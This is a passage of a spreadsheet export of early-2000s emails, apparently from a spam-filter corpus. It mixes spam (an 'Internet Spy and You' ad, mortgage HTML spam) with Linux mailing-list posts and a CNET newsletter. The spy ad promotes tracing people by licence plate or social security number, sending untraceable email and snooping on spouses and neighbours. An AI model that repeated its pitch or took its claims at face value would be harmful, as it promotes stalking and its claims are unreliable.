 &gt; sophisticated SOFTWARE program DESIGNED to automatically
 &gt; CRACK YOUR CASE with links to thousands of Public Record databases. 
 &gt; 
 &gt; Find out SECRETS about your relatives, friends, enemies,
 &gt; and everyone else! -- even your spouse! With the New,
 &gt;              INTERNET SPY AND YOU!
 &gt; 
 &gt; It's absolutely astounding! Here's what you can learn:
 &gt; 
 &gt; License plate number!
 &gt;  Get anyone's name and address with just a license plate number!
 &gt;  (Find that girl you met in traffic!)
 &gt; 
 &gt; Driving record! 
 &gt;  Get anyone's driving record
 &gt; 
 &gt; Social security number!
 &gt;   Trace anyone by social security number!
 &gt; 
 &gt; Address! 
 &gt;  Get anyone's address with just a name!
 &gt; 
 &gt; Unlisted phone numbers! 
 &gt;  Get anyone's phone number with just a name-even unlisted numbers!
 &gt; 
 &gt; Locate! 
 &gt;  Long lost friends, relatives, a past lover who broke your heart!
 &gt; 
 &gt; E-mail! 
 &gt; Send anonymous e-mail completely untraceable!
 &gt; 
 &gt; Dirty secrets!
 &gt;   Discover dirty secrets your in-laws don't want you to know!
 &gt; 
 &gt; Investigate anyone! 
 &gt;  Use the sources that private investigators use (all on the Internet)
 &gt;  secretly!
 &gt; 
 &gt; Ex-spouse!
 &gt;   Learn how to get information on an ex-spouse that will help you 
 &gt;   win in court!  (Dig up old skeletons)
 &gt; 
 &gt; Criminal search-Backround check!
 &gt;   Find out about your daughters boyfriend! 
 &gt;   (or her husband)
 &gt; 
 &gt; Find out! 
 &gt;  If you are being investigated!
 &gt; 
 &gt; Neighbors!
 &gt;   Learn all about your mysterious neighbors! Find out what they 
 &gt;   have to hide!
 &gt; 
 &gt; People you work with!
 &gt;   Be astonished by what you'll learn about people you work with!
 &gt;
 &gt; Education verification!
 &gt;   Did he really graduate college?  Find out!
 &gt; 
 &gt; Internet Spy and You
 &gt;  Software will help you discover ANYTHING about anyone, with 
 &gt;  clickable hyperlinks and no typing in Internet addresses! Just
 &gt;  insert the floppy disk and Go!
 &gt; 
 &gt; You will be shocked and amazed by the secrets that can be
 &gt;  discovered about absolutely everyone! Find out the secrets 
 &gt;  they don't want you to know! About others, about yourself! 
 &gt; 
 &gt; It's INCREDIBLE what you can find out using Internet Spy and You
 &gt;  and the Internet! You'll be riveted to your computer screen!
 &gt;  Get the software they're trying to ban! Before it's too late!
 &gt; 
 &gt; LIMITED TIME SPECIAL PRICE...ORDER TODAY!
 &gt; 
 &gt; Only $16.95 
 &gt; 
 &gt; 
 &gt; We will RUSH YOU our Internet Spy and You software so you can
 &gt;  begin discovering all the secrets you ever wanted to know!
 &gt; 
 &gt; You can know EVERYTHING about ANYONE with our Internet Spy and
 &gt; You Software. Works with all browsers and all versions of AOL!
 &gt; 
 &gt; ORDER TODAY: SEND ONLY $16.95 US CASH, CHECK, OR MONEY ORDER
 &gt; (you may also send one of your own address labels
 &gt; for accuracy if you have one.)
 &gt; 
 &gt; ATTENTION ORDERS OUTSIDE THE US:  You must ad $5 for shipping.
 &gt; 
 &gt; 
 &gt; *Foreign money orders must be payable on a US BANK AND IN US FUNDS!
 &gt; NO EXCEPTIONS!
 &gt; 
 &gt;
 &gt; 
 &gt; 
 &gt; DON'T WAIT TO GET STARTED... it's as easy as 1. 2. 3.
 &gt; 
 &gt; 
 &gt; STEP 1 - Print the order form text below
 &gt; 
 &gt; STEP 2 - Type or print your order information into the order form section
 &gt; 
 &gt; STEP 3 - Mail order form and payment to the address below
 &gt; 
 &gt; 
 &gt;           
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Mail the portion below&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 &gt; 
 &gt;     Send to:
 &gt; 
 &gt;    Web Systems
 &gt;    
 &gt;    PO BOX 1613
 &gt; 
 &gt;    Council Bluffs, IA 51502
 &gt; 
 &gt;    
 &gt;     U.S.A
 &gt;
 &gt;     
 &gt; 
 &gt;
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Mail-in Order Form &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 &gt; 
 &gt; 
 &gt; 
 &gt;
 &gt; Name: ______________________________
 &gt; 
 &gt; Address:  _____________________________
 &gt; 
 &gt;
 &gt; City/State/Zip __________________________________________
 &gt; 
 &gt; 
 &gt;
 &gt; 
 &gt;
 &gt; 
 &gt; 
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; end of form &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 &gt; 
 &gt; DISCLAIMER: The seller of this powerful software resource will not be 
 &gt; held responsible for how the purchaser chooses to use its resources.
 &gt; 
 &gt;
 &gt;
 &gt; 
 &gt; To be removed from our mailing list please
 &gt; send an email to exit1418@yahoo.com and put remove
 &gt; in the subject.
 &gt; Thank you
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --yLVHuoLXiP9kZBkt
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Feb 01, 2002 at 03:35:41PM +0100, Matthias Saou wrote:
 &gt; Once upon a time, Harri wrote :
 &gt;=20
 &gt; &gt; Title page has a login screen and I can't seem to get the apt indexes
 &gt; &gt; anymore. Is it just me or is something going on there?
 &gt;=20
 &gt; You can't get the file index from here either?
 &gt; http://apt.nixia.no/apt/files/
 The requested URL /apt/files/ was not found on this server.
 &gt; During the past few days, I've experienced connection problems with that
 &gt; site from time to time, but for me right now it's working.
 Maybe it's temporary :-/
 --=20
 Win a live rat for your mother-in-law!
 --yLVHuoLXiP9kZBkt
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE8WqwpQF8Oi9XNck4RAmDLAJ9vdN7wlECYEdkP/MDwWnykFA97OQCfZxJc
 F7RkwD9oaZV1rg/r8p06Dmw=
 =OXj6
 -----END PGP SIGNATURE-----
 --yLVHuoLXiP9kZBkt--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting John P. Looney (valen@tuatha.org):
 &gt;  The RPMS are. The distribution as a whole work is copyright of SuSE.
 I've not seen any claim from SuSE of copyright over the distribution 
 as a whole.  (That would be a "compilation copyright", to use the legal
 term.)  But they definitely assert (and in fact own) copyright over
 YaST, YaST2, and the associated installer program.
 So, if one wanted to distribute a version of SuSE free of encumbrances
 from SuSE Linux AG, one would merely have to write a replacement
 installer and do without YaST/YaST2 (and probably a few other things
 they wrote).  A Simple Matter of Programming.
 -- 
 Cheers,               "That article and its poster have been cancelled." 
 Rick Moen                   -- David B. O'Donnel, sysadmin for America Online
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cell phones coming soon
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Cell Phone Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/wr/442_cellphone_nwsltr.gif" width="442" height="60" border="0" alt="CNET Wireless Dispatch"&gt;&lt;br&gt;
 	&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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 shopping  --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /shopping --&gt;
 	&lt;br&gt;&lt;!-- right column content --&gt;
 	&lt;!-- search form --&gt;
 	&lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 		&lt;form method="get" action="http://www.search.com/redirect"&gt;
 		&lt;tr valign=top&gt;&lt;td&gt;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value="http://wireless.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;Wireless
  			&lt;option value="http://cnet.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;All CNET
  			&lt;option value="http://www.search.com/search?tag=ex.wireless.dispatch.srch.web"&gt;The Web
 			&lt;/select&gt;&amp;nbsp;
 			&lt;input type=submit value="Go!"&gt;&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 		&lt;/form&gt;
 	&lt;/table&gt;&lt;p&gt;
 	&lt;!-- /search form --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;&lt;img src="http://home.cnet.com/i/dp/dd_c.gif"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
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section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
 			&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;!-- td width=252&gt; --&gt;&lt;td width=150&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
 			&lt;font face="Arial, Helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="4" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=170&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h1"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h1"&gt;Cell phones coming soon--updated&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h2"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h2"&gt;Siemens S46&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td width=15&gt;&lt;a href="#h3"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 						&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h3"&gt;Cell phone personality test--updated&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;	
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=1 bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=240&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
 				&lt;div style="padding: 8px 0px 8px"&gt;&lt;font size="-1"&gt;&lt;b&gt;Wireless Top 5s&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 					&lt;ul&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4K4BZCu92fqfAgMcXea9R" &gt;Top 5 AT&amp;T Wireless cell phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRwVMcByfnODtxI8fiiuR" &gt;Top 5 Sprint PCS phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6M7v6-Dd5q0_HZB17WsR" &gt;Top 5 Verizon Wireless cell phones&lt;/a&gt;
 				&lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzA6N2rWEP26D_8gaZjMZR" &gt;All Top 5s&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;
 				&lt;img src="http://home.cnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 		&lt;tr valign=top&gt;&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 	&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;			
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/lx/sub_rev.gif" alt="Reviews &amp; Features" width="200" height="19" border="0"&gt;&lt;br&gt;
 		&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br /&gt;
 		 &lt;table cellpadding=0 cellspacing=0 border=0 width=100 align=left&gt;
 			&lt;tr&gt;&lt;td valign=top&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB680bDpVz-EDvznhjonleR" &gt;
 				&lt;img src="http://a.r.tv.com/cnet.1d/i/p/030102sexycell.jpg" width="85" height="110" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt; 
 &lt;!--item 1--&gt;		
 &lt;a name="h1"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMbPRnDU24YOLpk6Td6yR" &gt;Cell phones coming soon--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Before you buy, see what products are on the horizon. We have pictures and release dates for upcoming models.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbHx8Luh3RXvLF34ULXPR" &gt;Read the story&lt;/a&gt; &lt;!-- &amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tyzz0TzfZsihsBSWgp7dR" &gt;Notify me when this is available&lt;/a&gt; --&gt;&lt;/b&gt;
 &lt;br clear="all"&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--item 2--&gt;
 &lt;a name="h2"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjIl7tBt2H3f2jvrqULcR" &gt;Siemens S46&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The company's second mobile for the U.S. market picks up where the stylish S40 left off. Like that earlier model, this one's a world phone with business-centric features. How impressive is it?
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1Lk4v_VD8-mhe2RYEVuRR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- center1 --&gt;
 &lt;!-- /center1 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;a name="h3"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-_MIL2wZ5znP-FdWuuFR" &gt;Cell phone personality test--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Choose among our five user profiles to find out what models best match your wireless persona. Take the test and see them all.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWI7bDI79mkSWreAgRDc9R" &gt;Match your profile&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;
 &lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 	&lt;TBODY&gt;&lt;TR vAlign=top&gt;
     	&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
             &lt;UL&gt;&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7SMgUa9xv3orMjEsaQuR" &gt;Live tech help; submit your question now&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzzAozoCPhKQcaLlAI6OFR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qBTkDsKJTiMEyR1N6759R" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKH-e5sucLVdngyV7VDjSuR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0Ww9Y9Z-jekHF6q-jPexAdR" &gt;May Editors' Choice award: Pioneer's home-theater system, the HTS-910DV&lt;/A&gt; 
 			&lt;/UL&gt;
 			&lt;/B&gt;&lt;/FONT&gt;
 		&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 &lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 	&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- &lt;br&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="30" border="1"&gt;&lt;br&gt; --&gt;
 &lt;/td&gt;&lt;/tr&gt;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HREF='http://clickthru.online.com/Click?q=da-dTJjrXPTli245dErrRXDJA8_V-mXgdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvchl1BEqBxDVAmoBamZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXF_MUUdg98BbBL7kOi_dR"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href="http://clickthru.online.com/Click?q=19-BLe0I2rXOlAdMmyKMZ2Fz8IR7XcR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vCGRWxtktQ3DlPfP8NRR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAEL8O_rz9Z5VKc-3P0BlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwfih9COYjKHbtbXYzH4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKM851-O7Bc1bJBykEmeR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lcv78gMtuoAABMMPZ9FR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e459&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=98-FTtO-Wz561TdRdZcPOtuqPuN0dRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Razor 2.14 - the day after
</t>
  </si>
  <si>
    <t xml:space="preserve">I recently installed Razor v2.14 and started using it.  I am finding it
 necessary to whitelist a _lot_ of mailing lists.  Some, such as yahoogroups,
 I can't whitelist because the from: address is the person making the post,
 so I will have to whitelist on another field when I can modify my code to do
 so.  I wonder if someone is not being careful about their submissions, or if
 these are bad mailing lists that don't drop bad mail addresses that become
 trollboxes in time.
 Any employee who has left my company more than three years ago is eligible
 to become a trollbox.  I figure after three years of bounced mail, the list
 should have figured out they aren't here any more.
 Fox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</si>
  <si>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Once upon a time, Jesse wrote :
 &gt; On Fri, 20 Sep 2002 10:40:55 +0200
 &gt; Matthias Saou &lt;matthias@rpmforge.net&gt; wrote:
 &gt; 
 &gt; # But as it's the primary mailer I use, you can be sure that as soon
 &gt; # as it's updated to 0.8.3, I'll update my build! :-)
 &gt; 
 &gt; It got updated (;
 So did my build if the original source is what you were mentioning ;-)
 One drawback : They changed from pspell to aspell apparently, and it
 requires aspell &gt;= 0.50 which isn't even in Rawhide, so spell checking is
 disabled for now until I take a decision about it :-/
 If I build recent aspell packages, they may not be upgraded when ungrating
 to the next Red Hat Linux release (the final version of the limbos and
 (null) betas), which is maybe not really desired. I'll probably test and
 see...
 Matthias
 PS: The spec file was massively updated and the --with / --without options
 that can be used to rebuild the source packages are now listed in the
 description ;-)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</si>
  <si>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DDS-4 will hold 40 GB, media is about 42 (ex vat)euros per tape
 HP do DDS-4 backup tape drives to take those but they're
 about 1236 euros (ex vat) and thats for an internal model (taken from
 DCB Groups catalogue). There are other brands and various
 other tape formats to choose from, but just to give you a rough
 benchmark of pricing for that sorta capacity.
 Ther are options that will go up to crazy capacities by using
 using multiple tapes in a caddy... of course its gonna cost
 a lot more.
 I'd also be ensuring I had some sort of disk mirroring set up
 also... the more redundancy the better (within reason).
 G.
 ___________________________
  Graham Smith,
  Network Administrator,
  Department of Computing,
  Institute of Technology,
  Tallaght, Dublin 24
  Phone: + 353 (01) 4042840
 -----Original Message-----
 From: Ciaran Johnston [mailto:cj@nologic.org]
 Sent: 16 August 2002 15:09
 To: ilug@linux.ie
 Subject: [ILUG] Backup solutions
 Hi folks,
 I maintain a colocated server on behalf of a small group of individuals,
 and am looking at backup solutions. Is it possible to get some sort of low-
 end internal tape / other solution that could be used to back up approx. 40
 Gigs of data or am I just dreaming? My ISP does offer backups at extra cost
 but the only problem with that is, well, the extra cost.
 What I was hoping to do was to install some kind of internal tape device,
 then swap tapes round every month, so I had an onsite backup of say the
 last 24 hours and an offsite backup of the last month. Is this feasible?
 I'm beginning to think it isn't. External devices are not an option as part
 of the charge for colocation is rackspace.
 Thanks,
 Ciaran.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</si>
  <si>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Is Your Mortgage Payment Too High? Reduce It Now
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;TABLE height=3D400 cellSpacing=3D0 cellPadding=3D0 width=3D450 align=3Dce=
 nter border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D2&gt;&lt;A href=3D"http://61.129.68.18/user0201/index.asp?Afft=
 =3DQM12"&gt;&lt;IMG height=3D38 src=3D"http://61.129.68.17/mortgage/h1.gif" widt=
 h=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D138 height=3D178&gt;&lt;A href=3D"http://61.129.68.18/user0201/i=
 ndex.asp?Afft=3DQM12"&gt;&lt;IMG height=3D178 src=3D"http://61.129.68.17/mortgag=
 e/bullets.gif" width=3D138 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD width=3D312 height=3D178&gt;&lt;A href=3D"http://61.129.68.18/user0201/i=
 ndex.asp?Afft=3DQM12"&gt;&lt;IMG height=3D178 src=3D"http://61.129.68.17/mortgag=
 e/family.jpg" width=3D312 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D20&gt;&lt;A href=3D"http://61.129.68.18=
 /user0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D20 src=3D"http://61.129.68.=
 17/mortgage/bb.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D118&gt;&lt;A href=3D"http://61.129.68.1=
 8/user0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D118 src=3D"http://61.129.6=
 8.17/mortgage/text.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D46&gt;&lt;A href=3D"http://61.129.68.18=
 /user0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D46 src=3D"http://61.129.68.=
 17/mortgage/clickhere.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/=
 TABLE&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D450 align=3Dcenter&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D=
 1&gt;=FFFFFFA9 
       Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer l=
 ike us 
       to contact you or feel that you have&lt;BR&gt;received this email in error=
 , 
       please &lt;A href=3D"http://61.129.68.18/light/watch.asp"&gt;click here to=
       unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: ALSA Problem with Null kernel
</t>
  </si>
